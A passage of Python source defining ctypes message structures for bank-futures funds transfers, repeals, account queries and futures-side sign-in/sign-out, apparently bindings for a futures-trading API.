        ("NewBankAccount", c_char_Array_41),
        ("NewBankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("BankAccType", c_char),
        ("InstallID", c_int),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("TID", c_int),
        ("Digest", c_char_Array_36),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, Gender=None, CountryCode=None, CustType=None, Address=None, ZipCode=None, Telephone=None, MobilePhone=None, Fax=None, EMail=None, MoneyAccountStatus=None, BankAccount=None, BankPassWord=None, NewBankAccount=None, NewBankPassWord=None, AccountID=None, Password=None, BankAccType=None, InstallID=None, VerifyCertNoFlag=None, CurrencyID=None, BrokerIDByBank=None, BankPwdFlag=None, SecuPwdFlag=None, TID=None, Digest=None, LongCustomerName=None):
        super().__init__()
        for field, text in (
            ("TradeCode", TradeCode), ("BankID", BankID), ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID), ("BrokerBranchID", BrokerBranchID), ("TradeDate", TradeDate),
            ("TradeTime", TradeTime), ("BankSerial", BankSerial), ("TradingDay", TradingDay),
            ("LastFragment", LastFragment), ("CustomerName", CustomerName),
            ("IdCardType", IdCardType), ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender), ("CountryCode", CountryCode), ("CustType", CustType),
            ("Address", Address), ("ZipCode", ZipCode), ("Telephone", Telephone),
            ("MobilePhone", MobilePhone), ("Fax", Fax), ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus), ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord), ("NewBankAccount", NewBankAccount),
            ("NewBankPassWord", NewBankPassWord), ("AccountID", AccountID),
            ("Password", Password), ("BankAccType", BankAccType),
            ("VerifyCertNoFlag", VerifyCertNoFlag), ("CurrencyID", CurrencyID),
            ("BrokerIDByBank", BrokerIDByBank), ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag), ("Digest", Digest),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (("PlateSerial", PlateSerial), ("SessionID", SessionID),
                              ("InstallID", InstallID), ("TID", TID)):
            if number:
                setattr(self, field, number)
class ReqTransfer(Struct):
    """Bank-futures funds-transfer request.

    String constructor arguments are GBK-encoded; numeric ones (serials,
    amounts, fees, IDs) are stored as given. Falsy arguments are skipped,
    keeping the zeroed ctypes default.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("FutureSerial", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("FutureFetchAmount", c_double),
        ("FeePayFlag", c_char),
        ("CustFee", c_double),
        ("BrokerFee", c_double),
        ("Message", c_char_Array_129),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("TransferStatus", c_char),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, LongCustomerName=None):
        super().__init__()
        for field, text in (
            ("TradeCode", TradeCode), ("BankID", BankID), ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID), ("BrokerBranchID", BrokerBranchID), ("TradeDate", TradeDate),
            ("TradeTime", TradeTime), ("BankSerial", BankSerial), ("TradingDay", TradingDay),
            ("LastFragment", LastFragment), ("CustomerName", CustomerName),
            ("IdCardType", IdCardType), ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustType", CustType), ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord), ("AccountID", AccountID), ("Password", Password),
            ("UserID", UserID), ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID), ("FeePayFlag", FeePayFlag), ("Message", Message),
            ("Digest", Digest), ("BankAccType", BankAccType), ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType), ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc), ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag), ("OperNo", OperNo),
            ("TransferStatus", TransferStatus), ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (
            ("PlateSerial", PlateSerial), ("SessionID", SessionID),
            ("InstallID", InstallID), ("FutureSerial", FutureSerial),
            ("TradeAmount", TradeAmount), ("FutureFetchAmount", FutureFetchAmount),
            ("CustFee", CustFee), ("BrokerFee", BrokerFee),
            ("RequestID", RequestID), ("TID", TID),
        ):
            if number:
                setattr(self, field, number)
class RspTransfer(Struct):
    """Bank-futures funds-transfer response.

    Same layout as ReqTransfer plus ErrorID/ErrorMsg. String constructor
    arguments are GBK-encoded; numeric ones are stored as given; falsy
    arguments are skipped, keeping the zeroed ctypes default.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("FutureSerial", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("FutureFetchAmount", c_double),
        ("FeePayFlag", c_char),
        ("CustFee", c_double),
        ("BrokerFee", c_double),
        ("Message", c_char_Array_129),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("TransferStatus", c_char),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        super().__init__()
        for field, text in (
            ("TradeCode", TradeCode), ("BankID", BankID), ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID), ("BrokerBranchID", BrokerBranchID), ("TradeDate", TradeDate),
            ("TradeTime", TradeTime), ("BankSerial", BankSerial), ("TradingDay", TradingDay),
            ("LastFragment", LastFragment), ("CustomerName", CustomerName),
            ("IdCardType", IdCardType), ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustType", CustType), ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord), ("AccountID", AccountID), ("Password", Password),
            ("UserID", UserID), ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID), ("FeePayFlag", FeePayFlag), ("Message", Message),
            ("Digest", Digest), ("BankAccType", BankAccType), ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType), ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc), ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag), ("OperNo", OperNo),
            ("TransferStatus", TransferStatus), ("ErrorMsg", ErrorMsg),
            ("LongCustomerName", LongCustomerName),
        ):
            if text:
                setattr(self, field, text.encode("GBK"))
        for field, number in (
            ("PlateSerial", PlateSerial), ("SessionID", SessionID),
            ("InstallID", InstallID), ("FutureSerial", FutureSerial),
            ("TradeAmount", TradeAmount), ("FutureFetchAmount", FutureFetchAmount),
            ("CustFee", CustFee), ("BrokerFee", BrokerFee),
            ("RequestID", RequestID), ("TID", TID), ("ErrorID", ErrorID),
        ):
            if number:
                setattr(self, field, number)
class ReqRepeal(Struct):
    """Request structure for repealing (reversing) a bank-futures funds transfer.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints/doubles. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("RepealTimeInterval", c_int),
        ("RepealedTimes", c_int),
        ("BankRepealFlag", c_char),
        ("BrokerRepealFlag", c_char),
        ("PlateRepealSerial", c_int),
        ("BankRepealSerial", c_char_Array_13),
        ("FutureRepealSerial", c_int),
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("FutureSerial", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("FutureFetchAmount", c_double),
        ("FeePayFlag", c_char),
        ("CustFee", c_double),
        ("BrokerFee", c_double),
        ("Message", c_char_Array_129),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("TransferStatus", c_char),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, RepealTimeInterval=None, RepealedTimes=None, BankRepealFlag=None, BrokerRepealFlag=None, PlateRepealSerial=None, BankRepealSerial=None, FutureRepealSerial=None, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, LongCustomerName=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class RspRepeal(Struct):
    """Response structure for a bank-futures transfer repeal; adds ErrorID/ErrorMsg
    to the request layout.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints/doubles. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("RepealTimeInterval", c_int),
        ("RepealedTimes", c_int),
        ("BankRepealFlag", c_char),
        ("BrokerRepealFlag", c_char),
        ("PlateRepealSerial", c_int),
        ("BankRepealSerial", c_char_Array_13),
        ("FutureRepealSerial", c_int),
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("FutureSerial", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("FutureFetchAmount", c_double),
        ("FeePayFlag", c_char),
        ("CustFee", c_double),
        ("BrokerFee", c_double),
        ("Message", c_char_Array_129),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("TransferStatus", c_char),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, RepealTimeInterval=None, RepealedTimes=None, BankRepealFlag=None, BrokerRepealFlag=None, PlateRepealSerial=None, BankRepealSerial=None, FutureRepealSerial=None, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class ReqQueryAccount(Struct):
    """Request structure for querying a bank account balance via bank-futures transfer.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("FutureSerial", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, LongCustomerName=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class RspQueryAccount(Struct):
    """Response structure for a bank account query; adds BankUseAmount and
    BankFetchAmount to the request layout.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints/doubles. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("FutureSerial", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("BankUseAmount", c_double),
        ("BankFetchAmount", c_double),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, BankUseAmount=None, BankFetchAmount=None, LongCustomerName=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class FutureSignIO(Struct):
    """Futures-side sign-in/sign-out message structure (shared request layout).

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class RspFutureSignIn(Struct):
    """Response structure for futures-side sign-in; adds ErrorID/ErrorMsg and
    the session PinKey/MacKey to the request layout.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("PinKey", c_char_Array_129),
        ("MacKey", c_char_Array_129),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None, PinKey=None, MacKey=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class ReqFutureSignOut(Struct):
    """Request structure for futures-side sign-out (same layout as sign-in request).

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class RspFutureSignOut(Struct):
    """Response structure for futures-side sign-out; adds ErrorID/ErrorMsg to
    the request layout.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
